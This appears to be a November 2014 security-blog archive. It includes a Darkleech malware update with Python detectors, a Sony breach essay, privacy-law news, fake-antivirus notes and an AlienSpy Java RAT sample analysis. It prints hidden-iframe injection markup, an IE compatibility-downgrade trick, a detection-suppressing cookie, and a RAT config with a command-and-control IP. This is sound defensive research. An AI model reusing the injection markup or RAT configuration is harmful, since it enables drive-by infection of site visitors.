Monthly Archives: November 2014

Darkleech Update – November 2014

Just wanted to document some latest changes in Darkleech behavior that may help you detect it.

I’d like to thank internet security enthusiasts who share their findings with me. Without you, I could have easily missed these new (?) details.

Quick recap

Darkleech is a root-level server infection that installs malicious Apache modules. The modules inject invisible iframes into the server response once it has already been prepared (line breaks added for readability).

<style>.a4on6mz5h { position:absolute; left:-1376px; top:-1819px} </style> <div class="a4on6mz5h">
<ifr ame src="hxxp://tfmjst .hopto .org/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="247" height="557"></ifram e></div>

All the elements of this code are random and auto-generated on the fly (style name, coordinates, iframe dimensions, URL paths). Moreover, the iframe domains change every few minutes — lately hackers prefer free No-IP.com dynamic DNS hostnames like hopto.org, ddns.net, myftp.biz, myftp.org, serveftp.com, servepics.com, etc.

This infection is hard to detect as it only shows up once per IP per day (or perhaps even less often). And since it works at a low system level, it can detect whether server admins are logged in, so it lurks until they log out — this means that they won’t see anything even if they monitor outgoing TCP traffic.

For more details, please check the links at the bottom of this post.

What’s new?

IE=EmulateIE9

Recently it was pointed out to me that Darkleech now also adds the following meta tag, which switches Internet Explorer into IE 9 compatibility mode. It looks like it searches for the </head> tag and replaces it with the following code (again, line breaks added for readability):

<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>
<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class="syxq9la69">
<iframe src="hxxp://jsnrgo .ddns .net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="285" height="554"></iframe></div>

This IE=EmulateIE9 instruction tells modern versions of Internet Explorer to render a web page as if they were IE 9, using all the features that have been deprecated in IE 10 and newer versions of IE. Some of these legacy features are known to have vulnerabilities, and hackers try to exploit them by turning the compatibility mode on (e.g. VML-related exploits).

_SESSION_ID cookie

In addition to temporary IP blacklisting, Darkleech also uses the _SESSION_ID cookie that expires in one week. It adds the following cookie into response headers:

Set-Cookie: _SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/

So even if you change your IP address (e.g. if you have a dynamic IP address) you still won’t see the malware for the following 7 days. So don’t forget to clear/block cookies if you are trying to reproduce an infected response.

Most likely the IP blacklisting now lasts one week too.

Just a couple more things:

  • As you might have figured out, it looks for an Internet Explorer User-Agent (and derivatives like Maxthon, Avant).
  • The Referer is not important at the moment. I managed to trigger it even without the Referer header.
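
As an added example (not code from the original post), a small Python checker for the three indicators described above: the off-screen styled div with its iframe, the IE=EmulateIE9 meta tag glued to </head>, and the _SESSION_ID=-1 cookie. The sample response is constructed from the snippets quoted in the post; the IE 9 User-Agent string and the two-indicator threshold are my own choices.

```python
"""Heuristic check for the Darkleech injection pattern described in the post."""
import re
from urllib.parse import urlsplit

# Free dynamic-DNS suffixes the post lists as current favourites for the iframe hosts.
DYNDNS_SUFFIXES = ("hopto.org", "ddns.net", "myftp.biz", "myftp.org",
                   "serveftp.com", "servepics.com")

# <style>.rnd { position:absolute; left:-NNNNpx; top:-NNNNpx} </style>
HIDDEN_STYLE_RE = re.compile(
    r"<style>\s*\.(?P<cls>[a-z0-9]+)\s*\{\s*position\s*:\s*absolute\s*;"
    r"\s*left\s*:\s*-(?P<left>\d+)px\s*;\s*top\s*:\s*-(?P<top>\d+)px\s*\}\s*</style>",
    re.IGNORECASE)

# <meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'> glued directly to </head>
EMULATE_IE9_RE = re.compile(
    r"<meta\s+http-equiv=['\"]x-ua-compatible['\"]\s+content=['\"]IE=EmulateIE9['\"]"
    r"\s*/?>\s*</head>", re.IGNORECASE)

# Real IE 9 User-Agent string; the post says an IE UA is required to trigger the
# injection, cookies must be cleared, and the Referer header does not matter.
IE9_USER_AGENT = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


def reproduction_request_headers():
    """Headers to use when probing your own server: IE UA, no Cookie, no Referer."""
    return {"User-Agent": IE9_USER_AGENT, "Accept": "text/html"}


def host_of(url):
    """Hostname of a URL, accepting the defanged hxxp:// form used in the post."""
    return (urlsplit(url.replace("hxxp", "http", 1)).hostname or "").lower()


def is_dyndns_host(host):
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def find_hidden_iframes(body):
    """One record per off-screen <div class=X> whose X was declared by an injected <style>."""
    findings = []
    for m in HIDDEN_STYLE_RE.finditer(body):
        cls = m.group("cls")
        div_re = re.compile(
            r"<div\s+class=['\"]%s['\"]\s*>\s*<iframe\s[^>]*?src=['\"]([^'\"]+)['\"]"
            % re.escape(cls), re.IGNORECASE)
        d = div_re.search(body, m.end())
        if d is None:
            continue
        host = host_of(d.group(1))
        findings.append({"class": cls, "left": -int(m.group("left")),
                         "top": -int(m.group("top")), "src": d.group(1),
                         "host": host, "dyndns": is_dyndns_host(host)})
    return findings


def has_emulate_ie9(body):
    return EMULATE_IE9_RE.search(body) is not None


def sets_session_id_cookie(headers):
    """True if a Set-Cookie header carries the _SESSION_ID=-1 suppression cookie."""
    return any(name.lower() == "set-cookie" and re.match(r"\s*_SESSION_ID=-1(;|$)", value)
               for name, value in headers)


def scan_response(headers, body):
    """Combine the three indicators into one verdict for a single HTTP response."""
    iframes = find_hidden_iframes(body)
    result = {"hidden_iframes": iframes,
              "emulate_ie9_before_head": has_emulate_ie9(body),
              "session_id_cookie": sets_session_id_cookie(headers)}
    hits = len(iframes) + int(result["emulate_ie9_before_head"]) + int(result["session_id_cookie"])
    # A hidden iframe pointing at dynamic DNS is enough on its own; otherwise require two indicators.
    result["suspicious"] = hits >= 2 or any(f["dyndns"] for f in iframes)
    return result


# Constructed sample response, assembled from the markup and header quoted in the post.
SAMPLE_HEADERS = [("Content-Type", "text/html"),
                  ("Set-Cookie", "_SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/")]
SAMPLE_BODY = (
    "<html><head><title>shop</title>"
    "<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>"
    "<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> "
    '<div class="syxq9la69"><iframe src="hxxp://jsnrgo.ddns.net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2"'
    ' width="285" height="554"></iframe></div><body>hello</body></html>')
CLEAN_BODY = "<html><head><title>shop</title></head><body>hello</body></html>"

if __name__ == "__main__":
    for name, finding in scan_response(SAMPLE_HEADERS, SAMPLE_BODY).items():
        print(name, finding)
```

Run it against a response captured with reproduction_request_headers() from a fresh IP; a clean server should give no hidden iframes and no _SESSION_ID cookie.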

That’s it for today. Please let me know if you have some other news about Darkleech.

Previous posts about Darkleech:

 

The Absolute Worst Case – 2 Examples of Security’s Black Swans

You know that saying "It just got real"? If you're an employee of Sony Pictures - it just got real. In a very, very bad way. There are reports that the entire Sony Pictures infrastructure is down, computer, network, VPN and all - and that there isn't an ETR on target.

There are reports that there is highly sensitive information being held for "ransom", if you can call it that, by the attackers. There is even some reporting that someone representing the attackers has contacted the tech media and disclosed that the way they were able to infiltrate so completely was through insider help. In other words, the barbarians were literally inside the castle walls.


If you work in enterprise security I don't need to explain to you how bad this is, or how thoroughly this type of compromise breaks every single contingency plan most companies (outside the government, defense space) have in place. This compromise, an "IT matter" as Sony Pictures' PR calls it, is epic levels of bad.

Definition of Black Swan event, for clarity:
"The black swan theory or theory of black swan events is a metaphor that describes an event that comes as a surprise, has a major effect, and is often inappropriately rationalized after the fact with the benefit of hindsight."
--Source: Wikipedia-- https://en.wikipedia.org/wiki/Black_swan_theory

You can read some fantastic reporting on the issue here:

Although I truly do not envy those poor souls in Enterprise Security over at Sony Pictures, it's the broader implications of this kind of attack that seriously concern me. This isn't the first time we've seen this type of attack - where the attackers had complete and total access (allegedly) into the infrastructure of the enterprise. It won't be the last time. So can we learn something here, and take it with us going forward? I think we can, if we're willing to pay attention.

I'd like to pose a few hypothetical scenarios here, given the lesson we're learning again from this unfortunate case, and what can or should be done to avoid being, to put it mildly, thoroughly screwed.

Case- Insider Threat / Rogue Insider
Insider threats are the stuff of myth in much of enterprise security. We hear a lot about how dangerous they can be but it's rare that someone actually comes forward with a first-hand account. If this incident is truly an insider threat (rogue employee, aiding an outside attacker) then it will be a case used for years to illustrate the point.

Insiders hold a special place in the nightmares of enterprise security professionals, mostly because most of our defenses are positioned at our borders, so when someone who has access and is a trusted insider goes rogue we have very little recourse. This is the continuing problem we see as defenders - the M&Ms paradigm: hard outer shell, soft chewy middle.

A lifetime ago when I was leading up enterprise security engineering our team had discussions about how we were going to protect ourselves against this type of threat. We knew we had malicious insiders in many places with deep access and deeper pockets - so rooting them out wasn't going to work. If you can't keep them out then what's the next line of prevention? Maybe it's a little bit of 1990's technology like segmentation of network assets, separation of duties, and tight identity and access management controls. Beyond that, we profile people's behaviors and look to build operational baselines - I know this is much easier said than done, no need to repeat it.

So what happens when prevention fails, often catastrophically and publicly? We turn to detection and response. Failure to prevent isn't failure, it's a fail in the kill chain, forcing us to move to the next step down. Detection, swiftly and silently, is the next big key. Again, if you don't know what normal looks like you will never know what abnormal deviation is, I hope that's intuitive. I've never known an attacker that gets caught by an IPS signature - mainly because there is no such thing. So again, what does detection look like? I think it comes down to detecting deviations (even if they're subtle) in behavioral patterns of humans and/or systems. I don't think you need to spend a million dollars to do it. Maybe it's enough to use Marcus Ranum's "never-seen-before" idea. Take key assets, and build access tables for who accesses, how frequently, and when. Then look for net-new access (even if it's legal/allowed) and investigate. Sure, you may technically have access to that HR share, but you really shouldn't be accessing it, and under normal conditions you wouldn't.
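
An added illustration (not from the original post) of Ranum's never-seen-before idea as described above: build an access table from a baseline period, then flag net-new (user, asset) pairs and known pairs used at an hour of the day never seen before. The log lines are constructed; the one-hour slack rule for "unusual hour" is an assumption about what counts as a deviation.

```python
"""Never-seen-before access detection: baseline who touches which asset and when, then flag deviations."""
from datetime import datetime

# Constructed file-share access log (timestamp,user,asset); not real data.
BASELINE_LOG = """\
# timestamp,user,asset
2014-11-03T09:12:00,alice,fs01/finance
2014-11-03T14:40:00,alice,fs01/finance
2014-11-04T10:05:00,alice,fs01/finance
2014-11-03T09:30:00,bob,fs01/engineering
2014-11-04T16:50:00,bob,fs01/engineering
2014-11-05T11:20:00,bob,fs01/engineering
2014-11-03T08:55:00,carol,fs01/hr
2014-11-05T15:10:00,carol,fs01/hr
"""

# Constructed events from the period under review.
REVIEW_LOG = """\
2014-11-24T10:02:00,alice,fs01/finance
2014-11-24T13:15:00,bob,fs01/hr
2014-11-25T02:30:00,alice,fs01/finance
2014-11-25T09:00:00,dave,fs01/engineering
"""


def parse_events(text):
    """Return (timestamp, user, asset) tuples; blank lines and # comments are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, user, asset = (p.strip() for p in line.split(",", 2))
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), user, asset))
    return events


def build_baseline(events):
    """Access table keyed by (user, asset): how often, and at which hours of the day."""
    table = {}
    for ts, user, asset in events:
        rec = table.setdefault((user, asset), {"count": 0, "hours": set(), "first": ts, "last": ts})
        rec["count"] += 1
        rec["hours"].add(ts.hour)
        rec["first"] = min(rec["first"], ts)
        rec["last"] = max(rec["last"], ts)
    return table


def _hour_distance(a, b):
    # Distance on the 24-hour clock, so 23:00 and 01:00 are two hours apart.
    d = abs(a - b)
    return min(d, 24 - d)


def find_deviations(baseline, events, hour_slack=1):
    """Flag net-new (user, asset) pairs, and known pairs used at an hour never seen in the baseline.

    The access may well be permitted; the point is that it is new, and therefore worth a look."""
    known_assets = {asset for _, asset in baseline}
    alerts = []
    for ts, user, asset in events:
        rec = baseline.get((user, asset))
        if rec is None:
            why = "never-seen-before pair"
            why += " (asset already used by others)" if asset in known_assets else " (asset itself is new)"
            alerts.append({"when": ts, "user": user, "asset": asset, "reason": why})
        elif all(_hour_distance(ts.hour, h) > hour_slack for h in rec["hours"]):
            alerts.append({"when": ts, "user": user, "asset": asset, "reason": "unusual hour"})
    return alerts


if __name__ == "__main__":
    base = build_baseline(parse_events(BASELINE_LOG))
    for a in find_deviations(base, parse_events(REVIEW_LOG)):
        print(a["when"], a["user"], a["asset"], "->", a["reason"])
```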

But what if the things you're stealing as an insider threat are the things you work with and have access to every day? Well, then we focus on exfiltration (deeper down the kill chain). How does it leave your environment? Can you prevent people from taking data out of your network, or at least catch them when they try? I'm fairly confident the answer is no if it's just a general question - but if you can identify and tag at some meta-level things that are critical, really critical, to your organization maybe you can find when it's trying to leave the infrastructure without permission? I don't know the answer here mainly because one answer isn't going to solve all of the problems out there, and it's a "well, it depends" answer based on your company profile.

I can tell you this though, insider threats are models for using kill chain analysis.

Recovering from an insider is a little more difficult, particularly when you don't know who they are. Insiders can burrow deep, and stay hidden for a long time - sometimes going completely undiscovered. This means that if you're fairly sure you've been compromised by a malicious insider, but can't identify the attacker, you're in for a rough go at trying to figure out what state to restore to. Do you restore your network/infrastructure to 2 days ago? 2 weeks ago? 2 months ago? The answer is uncertain until you find and profile the attacker. Once you do, you're likely to discover that you can't trust much of your infrastructure telemetry if the attacker was well-hidden. Covering their tracks is something "advanced" adversaries are good at.

The things to think about here are two-fold. First - you need to identify and attribute the attack to someone, or a group. Post-haste. Yesterday speeds. You need to know who they are, so you can start tracing their steps and figure out what they did, when they did it, and the extent of the potential damage. If you can't figure this out quickly, getting the infrastructure to a working state may not do you any good because it could still be compromised in that state, or could leave you open to another run at compromise further down the line when you believe you've removed the threat.

Second, you need to restore services and bring back the business. Today many companies simply cease to exist without IT. If you want to degrade or destroy a company - take away their ability to network and communicate. The battle of service restoration versus security analysis will be bitter, and you'll probably lose as the CISO. Restore services, and figure out what's going on, maybe in parallel, maybe not - but that first step is almost universal with the notable exception of a few industry segments where being secured is as critical as being online.


Case- Compromised Core Infrastructure
Nothing says you're about to have a bad day like the source of a major attack on your enterprise coming through your endpoint management infrastructure. This starts to feel a lot like an insider threat - although it doesn't necessarily have to be. I can't even imagine the horror of finding out that your endpoint patching and software delivery platform has been re-purposed to deliver malware to all of your endpoints and that it has been the focal point of your adversary's operations. If you can't trust your core infrastructure - what can you trust?

Perhaps trust is the wrong way to look at it, as my friend Steve Ragan pointed out. So what then?

Within the enterprise framework there has to be some piece of infrastructure that is trusted. Maybe it's a system that stays physically offline (off?) until it's critically needed with alternate credentials and operational parameters. Maybe it's a recovery platform that you have a known-good hash of so that you can quickly validate you're working with the genuine article. Maybe it's something else, but you have to have something to trust.

If you have a compromised core infrastructure, I think you're looking at one of two options. Option A is restoring your systems to a questionable state (but not obviously compromised and usable) and working backwards to find the intruder. Option B is closing everything down and re-deploying everything and starting from scratch. Option B may very well sound like the more security-sound option until you factor in the actual data. Nothing says your data can't be compromised...it's not just about Windows credentials. Maybe some of your company's top-secret documents are PDFs. Maybe the attacker was clever and trojaned all of your PDFs such that as soon as one is opened, the compromise starts all over again.

I seriously doubt that would be detected because it's likely custom-written code and won't pop up on all but the most sophisticated (dare I say "next ten") detection tools.

My suggestion here? Start with the inner-most critical components of your infrastructure, audit and reset credentials and work your way out in concentric rings until you start to get to components which you can actually get by without. This exercise should keep your operations teams busy for a while, and you can maybe even get a parallel incident response investigation going in the meantime. On the plus side, this gives you a tiny window within which to start to build things better from the ashes. Or maybe not since you'll be going at light speed plus 1mph. This is, however, the only advice that makes sense. It's also the only advice I can give you that I have actually tried myself - and as painful as it sounds, believe me when I say that in real life it's significantly worse.


Before this post gets too long (or have we long since crossed that bridge?) I think it's safe to say that very few of you reading this post are operationally prepared to handle this type of incident where you've either got a malicious insider who has gone undetected and wreaked utter chaos, or a compromised core infrastructure by an outsider - or both if you've won the crap lottery. That's a problem because this is our black swan. This is our version of planes with hijackers flying into buildings. We know it's a possibility, but none of us have the resources to prepare, and let's face it - we have bigger problems. Except that these incidents are real. And the Black Swan is real. It happens. Now what?

Does this adjust your world view, or risk model for your organization somehow? If so, in what way? Will you start taking the insider threat more seriously as a result? Why or why not... and how? By my unscientific calculation there are probably .05% of companies out there who have the capital and the resources to pull off recovering from one of these Black Swan events, with anything even resembling success. The rest of us in the enterprise? What do we do when the worst-case happens?

I'm curious on how you see things. Leave a comment here, or take the conversation to Twitter with the hashtag #DtSR - let's talk about it. I think we can learn something from the horrendous situation Sony Pictures is living right now - let's not waste a teachable moment for everyone, collectively, to get even a tiny bit better.

Massachusetts Attorney General Reaches Settlement with Boston Hospital Over Data Security Allegations

On November 21, 2014, Massachusetts Attorney General Martha Coakley announced that Boston hospital Beth Israel Deaconess Medical Center (“BIDMC”) has agreed to pay a total of $100,000 to settle charges related to a data breach that affected the personal and protected health information of nearly 4,000 patients and employees.

In its complaint, the Attorney General alleged that a trespasser entered an unlocked office of a BIDMC physician and stole a personal laptop containing unencrypted names, Social Security numbers and medical information of 4,000 patients and employees. The Attorney General alleged that the breach was a result of BIDMC’s failure to lawfully protect the personal and protected health information of its patients and employees in violation of the Massachusetts Consumer Protection Act, the Massachusetts Data Security Law, and the federal Health Insurance Portability and Accountability Act.

Pursuant to the consent judgment, BIDMC will pay $100,000 to resolve the allegations. $15,000 of the $100,000 settlement will be applied to a fund administered by the Attorney General for data protection educational programs. The consent judgment also requires BIDMC to “take steps to ensure future compliance with state and federal data security laws and regulations,” including the implementation of enhanced device management, encryption and training policies.

In response to the settlement, Massachusetts Attorney General Martha Coakley said that “[t]he healthcare industry’s increased reliance on technology makes it more important than ever that providers ensure patients’ personal information and protected health information is secure,” and that “[t]o prevent breaches like this from happening, hospitals must put in place and enforce reasonable technological and physical security measures.”

3 Rules for Cyber Monday


It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

Which brings me nicely to the topic of this blog: online shopping at work.

It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday - all aimed at getting us to part with our hard earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security, the online shopping season could turn out to be the nightmare before Christmas.

In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

To help prevent distraction and clogged bandwidth, I know of one customer, I’m sure there are others, who is allowing his employees time to shop from their desks in their lunch breaks. He’s a smart man - productivity stays high and employees happy.

But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol indicates that the purchase is encrypted and secure. In addition, brief them to be alert for phishing scams and not to open emails, or click on links from unknown contacts.

Hunton Global Privacy Update – November 2014

On November 18, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program covered a number of privacy and data protection topics, including a report on the International Conference of Data Protection and Privacy Commissioners, highlights on the Council of the European Union’s proposed revisions to the compliance obligations of data controllers and data processors included in Chapter IV of the forthcoming EU General Data Protection Regulation, and U.S. highlights on California’s breach report and Federal Communications Commission enforcement actions.

Listen to a recording of the November 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for January 20, 2015.

Rango MultiRogue 2014

This Chameleon fake antivirus checks the OS version (XP, Vista, Seven) and changes its name and skin accordingly: Rango Win 7 Protection 2014, Rango Win 8 Antivirus 2014, Rango Vista Protection 2014, (...). It reports fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.

Centre’s Risk Workshop II in Brussels Emphasizes that Risk-Based Approach to Privacy Does Not Change Legal Obligations but Helps Calibrate Their Effective Implementation

On November 18, 2014, the Centre for Information Policy Leadership at Hunton & Williams (the “Centre”) held the second workshop in its ongoing work on the risk-based approach to privacy and a Privacy Risk Framework. Approximately 70 Centre members, privacy regulators and other privacy experts met in Brussels to discuss the benefits and challenges of the risk-based approach, operationalizing risk assessments within organizations, and employing risk analysis in enforcement. In discussing these issues, the speakers emphasized that the risk-based approach does not change the obligation to comply with privacy laws but helps with the effective calibration of privacy compliance programs.

The workshop was kicked off by Bojana Bellamy, the Centre’s President, and Fred Cate, Senior Policy Advisor for the Centre, who had prepared a discussion draft of the Centre’s second white paper on the risk-based approach to privacy, The Role of Risk in Data Protection. The paper is now being finalized with learnings from the workshop for wider distribution in the coming weeks.

Fred Cate also moderated the first panel on the benefits and challenges of the risk-based approach, during which he, Commissioner Julie Brill of the Federal Trade Commission, Peter Hustinx of the European Data Protection Supervisor, Florence Raynal of the French Data Protection Authority (the “CNIL”), JoAnn Stonier of MasterCard, and Danny Weitzner of Massachusetts Institute of Technology discussed questions such as (1) what is driving the recently intensified focus on risk assessments as a privacy compliance tool in the modern information age, and (2) what is the risk-based approach’s potential for more effectively calibrating compliance and implementing existing privacy principles and legal obligations. The panelists also discussed examples of instances where risk assessments are currently required or used under existing legal regimes, including the EU Data Protection Directive and the FTC Act, as well as the types of harms to individuals and society that can or should be considered in the context of privacy risk assessments and whether government (legislatures or regulators) should provide more guidance on risk assessments.

During lunch, Luca DeMatteis, Italian Presidency of the Council of the European Union, Justice Counselor (Cooperation in Criminal Matters and Data Protection), Permanent Representation of Italy to the EU, discussed the progress of the Council’s expert working group on the proposed EU General Data Protection Regulation (“Proposed Regulation”) and how the Council intends to incorporate the risk-based approach in the Proposed Regulation.

The second panel on operationalizing risk assessments within organizations considered different approaches businesses currently take in assessing potential privacy risks and the privacy-related impact of their products and services. The panel comprised of representatives of Acxiom, Apple, Google, Nokia and Accenture. It also included Naomi Lefkovitz, Senior Privacy Policy Advisor of the National Institute of Standards and Technology (“NIST”) at the U.S. Department of Commerce, who discussed NIST’s privacy engineering initiative and Privacy Risk Model. A key message from this panel was that the ongoing work on the risk-based approach to privacy is not about substituting risk assessments for compliance with legal requirements but about developing a methodology for complying with the law more effectively.

During the third panel, Richard Thomas, Global Strategy Advisor for the Centre and former UK Privacy Commissioner, Jacob Kohnstamm of the Dutch Data Protection Authority, Manuela Siano of the Italian Data Protection Authority (the Garante), David Smith of the UK Information Commissioner’s Office, and Wojciech Rafal Wiewiórowski of the Polish Data Protection Authority, discussed the use of risk assessments in privacy enforcement. Particular points of focus included:

  • the value of risk assessments in facilitating effective enforcement prioritization,
  • whether enforcement authorities should consider societal harms in addition to harms to individuals when making enforcement decisions, and
  • the role of enforcement authorities in providing guidance on the relevant factors to consider in organizational risk assessments.

The objectives of the Centre’s Privacy Risk Framework Project are discussed in detail in the Centre’s June 2014 white paper, A Risk-based Approach to Privacy: Improving Effectiveness in Practice. The paper notes how the Privacy Risk Framework project elaborates on the Centre’s earlier work on organizational accountability by seeking to develop analytical tools and a common framework and methodology for risk assessments that are needed to effectively implement key aspects of accountability.

The Centre has tentative plans to hold its Risk Workshop III on March 4, 2015, in the margins of the IAPP Global Privacy Summit in Washington, D.C.

Zorton Multirogue 2014

This Chameleon fake antivirus checks the OS version (XP, Vista, Seven) and changes its name and skin accordingly: Zorton Win 7 Protection 2014, Zorton Win 8 Antivirus 2014, Zorton Vista Protection 2014, (...). It reports fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.


Thanks to @kafeine for the sample

Court Orders Debt Brokers to Notify Consumers Following FTC Allegations of Unlawful Disclosure of Personal Information

On November 12, 2014, the Federal Trade Commission announced that in response to FTC complaints, a federal court has ordered two debt brokerage companies to notify over 70,000 consumers whose sensitive personal information was posted on a public website by the debt brokerage companies.

The two defendants are debt brokers that sell portfolios of consumer debt for eventual collection by third party debt collectors. The FTC alleged that the defendants attempted to sell their portfolios by posting them on a public online marketplace in the form of unencrypted, unprotected Excel spreadsheets. These spreadsheets allegedly contained sensitive personal information, including the indebted consumers’ bank account and credit card numbers, birth dates, contact information, employers’ names, and information about debts the consumers allegedly owed. Based on these allegations, the FTC charged these defendants in two separate complaints with violating Section 5 of the FTC Act by unfairly exposing consumers’ personal information without their knowledge or consent.

In separate decisions, the court found that there was good cause to believe that the defendants engaged in acts and practices that violated Section 5 of the FTC Act. Through the issuance of preliminary injunctions, the court required the defendants to provide notice to the consumers whose sensitive information had been posted. The court also ordered the defendants to notify the affected consumers of how they can protect themselves against identity theft and other fraud in light of the disclosures.

According to Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, “[d]ebt brokers and collectors who play fast and loose with people’s sensitive personal and financial information are causing tremendous harm.” Rich warned that “[c]ompanies must treat sensitive consumer information with appropriate care and security, and the FTC will take action when they fail to do so.”

AlienSpy Java RAT samples and traffic information



AlienSpy, a Java-based cross-platform RAT, is another reincarnation of the ever-popular Unrecom/Adwind and Frutas RATs that have been circulating throughout 2014.

It appears to be used in the same campaigns as Unrecom/Adwind was - see the references. If the C2 responds, the Java RAT downloads Jar files containing the Windows Pony/Ponik loader. The RAT is cross-platform and installs and beacons from OS X and Linux as well. However, it did not download any additional malware while running on OS X and Linux.

The samples, pcaps, and traffic protocol information are available below.




File information


I
File: DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
Size: 131178
MD5:  DB46ADCFAE462E7C475C171FBE66DF82

File: 01234.exe (Pony loader dropped by FAB8DE636D6F1EC93EEECAADE8B9BC68 - Transfer.jar)
Size: 792122
MD5:  B5E7CD42B45F8670ADAF96BBCA5AE2D0

II
File: 79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar
Size: 125985
MD5:  79E9DD35AEF6558461C4B93CD0C55B76

III
File: B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
Size: 49084
MD5:  b2856b11ff23d35da2c9c906c61781ba


Download


Original jar attachment files
B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar

Pcap files download
AlienSpyRAT_B2856B11FF23D35DA2C9C906C61781BA.pcap
AlienSpyRAT_79E9DD35AEF6558461C4B93CD0C55B76.pcap
Pony_B5E7CD42B45F8670ADAF96BBCA5AE2D0.pcap
AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-OSXLion.pcap
AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-WinXP.pcap

All files (including those created and downloaded)


References

Research:
Boredliner: Cracking obfuscated Java code - Adwind 3 (detailed Java analysis)
Fidelis: RAT in a jar: A phishing campaign using Unrecom (May 21, 2014)
Crowdstrike: Adwind RAT rebranding
Symantec: Adwind RAT
Symantec: Frutas RAT
Symantec: Ponik/Pony

Java Serialization References: 
https://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html
http://www.kdgregory.com/index.php?page=java.serialization
http://staf.cs.ui.ac.id/WebKuliah/java/MasteringJavaBeans/ch11.pdf


Additional File details


Alienspy RAT
The following RAT config strings were extracted from memory dumps. Alienspy RAT is a reincarnation of Unrecom/Adwind (itself derived from Frutas RAT) and is available from https://alienspy.net/
As the config shows, it is very similar to Unrecom/Adwind.
File: paymentadvice.jar
Size: 131178

MD5:  DB46ADCFAE462E7C475C171FBE66DF82
    ───paymentadvice.jar
        ├───META-INF
        │       MANIFEST.MF  <<MD5:  11691d9f7d585c528ca22f7ba6f4a131 Size: 90
        │
        ├───plugins
        │       Server.class <<MD5:  3d9ffbe03567067ae0d68124b5b7b748 Size: 520 << Strings are here
        │
        └───stub
                EcryptedWrapper.class <<MD5:  f2701642ac72992c983cb85981a5aeb6 Size: 89870
                EncryptedLoader.class <<MD5:  3edfd511873b30d1373a4dc54db336ee Size: 223356
                EncryptedLoaderOld.class << MD5:  b0ef7ff41caf69d9ae076c605653c4c7 Size: 15816
                stub.dll << MD5:  64fb8dfb8d25a0273081e78e7c40ca5e Size: 43648 << Strings are here


Alienspy Rat Config strings
DB46ADCFAE462E7C475C171FBE66DF82
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="vbox">false</entry>
<entry key="password">a2e74aef2c17329f0e8e8f347c62a6a03d16b944</entry>
<entry key="p2">1079</entry>
<entry key="p1">1077</entry>
<entry key="ps_hacker">false</entry>
<entry key="install_time">2000</entry>
<entry key="taskmgr">false</entry>
<entry key="connetion_time">2000</entry>
<entry key="registryname">GKXeW0Yke7</entry>
<entry key="wireshark">false</entry>
<entry key="NAME">IHEAKA</entry>
<entry key="jarname">unXX0JIhwW</entry>
<entry key="dns">204.45.207.40</entry>
<entry key="ps_explorer">false</entry>
<entry key="msconfig">false</entry>
<entry key="pluginfoldername">m4w6OAI02f</entry>
<entry key="extensionname">xBQ</entry>
<entry key="install">true</entry>
<entry key="win_defender">false</entry>
<entry key="uac">false</entry>
<entry key="jarfoldername">9bor9J6cRd</entry>
<entry key="mutex">xooJlYrm61</entry>
<entry key="prefix">IHEAKA</entry>
<entry key="restore_system">false</entry>
<entry key="vmware">false</entry>
<entry key="desktop">true</entry>
<entry key="reconnetion_time">2000</entry>
</properties>

IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
